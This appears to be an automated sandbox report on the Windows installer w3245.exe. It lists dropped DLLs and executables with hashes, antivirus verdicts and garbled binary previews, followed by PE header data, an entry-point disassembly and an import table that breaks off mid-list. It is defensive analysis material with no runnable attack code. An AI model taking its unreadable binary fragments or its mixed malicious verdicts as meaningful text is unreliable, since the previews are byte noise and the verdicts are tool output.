                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8581632
                                                                                                                                                            Entropy (8bit):6.736578346160889
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                            MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                            SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                            SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                            SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1053696
                                                                                                                                                            Entropy (8bit):6.539052666912709
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                            MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                            SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                            SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                            SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):356352
                                                                                                                                                            Entropy (8bit):6.447802510709224
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                            MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                            SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                            SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                            SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6487736
                                                                                                                                                            Entropy (8bit):7.518089126573906
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                            MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):664064
Entropy (8bit):6.953961612144461
Encrypted:false
SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:A147F46E2E1F315AA219482D645BEED9
SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
File Type:data
Category:dropped
Size (bytes):60283
Entropy (8bit):4.569551839311306
Encrypted:false
SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
MD5:3620E2D48EB60EC875FB9262ABC87D2B
SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
Malicious:false
Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):421200
Entropy (8bit):6.59808962341698
Encrypted:false
SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:03E9314004F504A14A61C3D364B62F66
SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):770384
Entropy (8bit):6.908020029901359
Encrypted:false
SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:67EC459E42D3081DD8FD34356F7CAFC1
SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
File Type:data
Category:dropped
Size (bytes):4567853
Entropy (8bit):7.952114001019503
Encrypted:false
SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
MD5:30152DF1AEA607F1159EFEEAC2B8CED1
SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
Malicious:false
Preview:.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

Process:C:\Users\user\Desktop\w3245.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):15692672
Entropy (8bit):7.995895236161738
Encrypted:true
SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
MD5:EC4072E1AE2A9316270E6AFD66235A97
SHA1:EC499500172CA2CC76C5B30ECA34FCEB9BACCE0D
SHA-256:C5056AC95A2002BC08CB0EC8DBF064F78DFF400642EC1A6FC2A132984A7C1D99
SHA-512:80A87456A9B2AE9344F42A2F09F29B4CBCDBDA61418270EF1BAF11399C7E0FAC0C6A95D51682BA6205DB908B84E17D7C4A3FF78EBAC3EFEC75F5298B56CBEB7A
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................$:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...$:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.995926722079058
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:w3245.exe
File size:15'806'278 bytes
MD5:e92b4d3ee13da899ea0ad5b54a0094ed
SHA1:6068b49ac36eb618d20f5b3b4efad1d9bac68f5b
SHA256:97abaf743b7b33aa0f0c6ab83527cc253c9e231c4e68da5d9a42fc45ef655877
SHA512:de2156ba0bd71f3cd30bd9c2bbed9e1a4417c747252bb0c3205097b6a6ff45dfe5c4dd94650efbe635d5bd821172756f261dab42b998c7e4cd158e206f678bbd
SSDEEP:393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXj2:sRcqetYMe6dgB4QoxwgD/j2
TLSH:22F63332A534403AE7F50577EE29A2347E78E320575189BBE2D4FD0A6DB4489A7F3213
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@.......@......y@.......@..."|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@.
Icon Hash:2d2e3797b32b2b99
Entrypoint:0x42e2a6
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x5A10AD86 [Sat Nov 18 22:00:38 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:d7e2fd259780271687ffca462b9e69b7

Instruction
call 00007F6F7CB07A7Fh
jmp 00007F6F7CB073F3h
mov eax, dword ptr [esp+08h]
mov ecx, dword ptr [esp+10h]
or ecx, eax
mov ecx, dword ptr [esp+0Ch]
jne 00007F6F7CB0756Bh
mov eax, dword ptr [esp+04h]
mul ecx
retn 0010h
push ebx
mul ecx
mov ebx, eax
mov eax, dword ptr [esp+08h]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, dword ptr [esp+08h]
mul ecx
add edx, ebx
pop ebx
retn 0010h
int3
int3
int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            int3
                                                                                                                                                            cmp cl, 00000040h
                                                                                                                                                            jnc 00007F6F7CB07577h
                                                                                                                                                            cmp cl, 00000020h
                                                                                                                                                            jnc 00007F6F7CB07568h
                                                                                                                                                            shrd eax, edx, cl
                                                                                                                                                            shr edx, cl
                                                                                                                                                            ret
                                                                                                                                                            mov eax, edx
                                                                                                                                                            xor edx, edx
                                                                                                                                                            and cl, 0000001Fh
                                                                                                                                                            shr eax, cl
                                                                                                                                                            ret
                                                                                                                                                            xor eax, eax
                                                                                                                                                            xor edx, edx
                                                                                                                                                            ret
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            jmp 00007F6F7CB0756Fh
                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                            call 00007F6F7CB0DDECh
                                                                                                                                                            pop ecx
                                                                                                                                                            test eax, eax
                                                                                                                                                            je 00007F6F7CB07571h
                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                            call 00007F6F7CB0DE75h
                                                                                                                                                            pop ecx
                                                                                                                                                            test eax, eax
                                                                                                                                                            je 00007F6F7CB07548h
                                                                                                                                                            pop ebp
                                                                                                                                                            ret
                                                                                                                                                            cmp dword ptr [ebp+08h], FFFFFFFFh
                                                                                                                                                            je 00007F6F7CB07E04h
                                                                                                                                                            jmp 00007F6F7CB07DE1h
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            push dword ptr [ebp+08h]
                                                                                                                                                            call 00007F6F7CB07E1Dh
                                                                                                                                                            pop ecx
                                                                                                                                                            pop ebp
                                                                                                                                                            ret
                                                                                                                                                            push ebp
                                                                                                                                                            mov ebp, esp
                                                                                                                                                            test byte ptr [ebp+08h], 00000001h
                                                                                                                                                            push esi
                                                                                                                                                            mov esi, ecx
                                                                                                                                                            mov dword ptr [esi], 00460DB8h
                                                                                                                                                            je 00007F6F7CB0756Ch
                                                                                                                                                            push 0000000Ch
                                                                                                                                                            push esi
                                                                                                                                                            call 00007F6F7CB0753Dh
                                                                                                                                                            pop ecx
                                                                                                                                                            pop ecx
                                                                                                                                                            mov eax, esi
                                                                                                                                                            pop esi
                                                                                                                                                            pop ebp
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x686b4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6d000 | 0x3a24 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x3dfc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x67650 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x676a4 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x67030 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4b000 | 0x3e0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x68234 | 0x100 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x49937 | 0x49a00 | 2319c0baa707bb66cc0bc08c55a13d8c | False | 0.5314688561120543 | data | 6.570006046413636 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x4b000 | 0x1ed60 | 0x1ee00 | 8ad6c4e18165c6d8ccdc97bab683438d | False | 0.3136386639676113 | data | 5.114228301263695 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6a000 | 0x1730 | 0xa00 | 00fde973df27dc2d36084e16d6dddbdf | False | 0.274609375 | firmware 2005 v9319 (revision 0) N\346@\273\261\031\277D V2, 0 bytes or less, UNKNOWN2 0xffffffff, at 0 0 bytes , at 0 0 bytes , at 0x20a14600 | 3.1526594027632213 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn | 0x6c000 | 0x38 | 0x200 | e9ca1c09062508c3b92e35754e60f8d0 | False | 0.107421875 | data | 0.5734966016060967 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x6d000 | 0x3a24 | 0x3c00 | 88921ee6f52b1477449352c993b3919c | False | 0.3304036458333333 | data | 5.550645858532838 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x71000 | 0x3dfc | 0x3e00 | dd2c47fa48872886af4c9a2e5bd90ccc | False | 0.8097278225806451 | data | 6.794335469567533 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6d178 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.43185920577617326
RT_MESSAGETABLE | 0x6da20 | 0x2840 | data | English | United States | 0.28823757763975155
RT_GROUP_ICON | 0x70260 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0x70274 | 0x2dc | data | English | United States | 0.4781420765027322
RT_MANIFEST | 0x70550 | 0x4d2 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1174), with CRLF line terminators | English | United States | 0.47568881685575365
DLL | Import
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, InitiateSystemShutdownExW, GetUserNameW, RegQueryValueExW, RegDeleteValueW, CloseEventLog, OpenEventLogW, ReportEventW, ConvertStringSecurityDescriptorToSecurityDescriptorW, DecryptFileW, CreateWellKnownSid, InitializeAcl, SetEntriesInAclW, ChangeServiceConfigW, CloseServiceHandle, ControlService, OpenSCManagerW, OpenServiceW, QueryServiceStatus, SetNamedSecurityInfoW, CheckTokenMembership, AllocateAndInitializeSid, SetEntriesInAclA, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, RegSetValueExW, RegQueryInfoKeyW, RegEnumValueW, RegEnumKeyExW, RegDeleteKeyW, RegCreateKeyExW, GetTokenInformation, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptReleaseContext, CryptAcquireContextW, QueryServiceConfigW
USER32.dll | PeekMessageW, PostMessageW, IsWindow, WaitForInputIdle, PostQuitMessage, GetMessageW, TranslateMessage, MsgWaitForMultipleObjects, PostThreadMessageW, GetMonitorInfoW, MonitorFromPoint, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, CreateWindowExW, UnregisterClassW, RegisterClassW, DefWindowProcW, DispatchMessageW
OLEAUT32.dll | VariantInit, SysAllocString, VariantClear, SysFreeString
GDI32.dll | DeleteDC, DeleteObject, SelectObject, StretchBlt, GetObjectW, CreateCompatibleDC
SHELL32.dll | CommandLineToArgvW, SHGetFolderPathW, ShellExecuteExW
ole32.dll | CoUninitialize, CoInitializeEx, CoInitialize, StringFromGUID2, CoCreateInstance, CoTaskMemFree, CLSIDFromProgID, CoInitializeSecurity
KERNEL32.dll | GetCommandLineA, GetCPInfo, GetOEMCP, CloseHandle, CreateFileW, GetProcAddress, LocalFree, HeapSetInformation, GetLastError, GetModuleHandleW, FormatMessageW, lstrlenA, lstrlenW, MultiByteToWideChar, WideCharToMultiByte, LCMapStringW, Sleep, GetLocalTime, GetModuleFileNameW, ExpandEnvironmentStringsW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, GetFullPathNameW, CompareStringW, GetCurrentProcessId, WriteFile, SetFilePointer, LoadLibraryW, GetSystemDirectoryW, CreateFileA, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, GetProcessHeap, FindClose, GetCommandLineW, GetCurrentDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, MoveFileExW, GetCurrentProcess, GetCurrentThreadId, InitializeCriticalSection, DeleteCriticalSection, ReleaseMutex, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, CreateProcessW, GetVersionExW, VerSetConditionMask, FreeLibrary, EnterCriticalSection, LeaveCriticalSection, GetSystemTime, GetNativeSystemInfo, GetModuleHandleExW, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetEnvironmentStringsW, VerifyVersionInfoW, GetVolumePathNameW, GetDateFormatW, GetUserDefaultUILanguage, GetSystemDefaultLangID, GetUserDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, DuplicateHandle, InterlockedExchange, InterlockedCompareExchange, LoadLibraryExW, CreateEventW, ProcessIdToSessionId, OpenProcess, GetProcessId, WaitForSingleObject, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, CreateThread, GetExitCodeThread, SetEvent, WaitForMultipleObjects, InterlockedIncrement, InterlockedDecrement, ResetEvent, SetEndOfFile, SetFileTime, 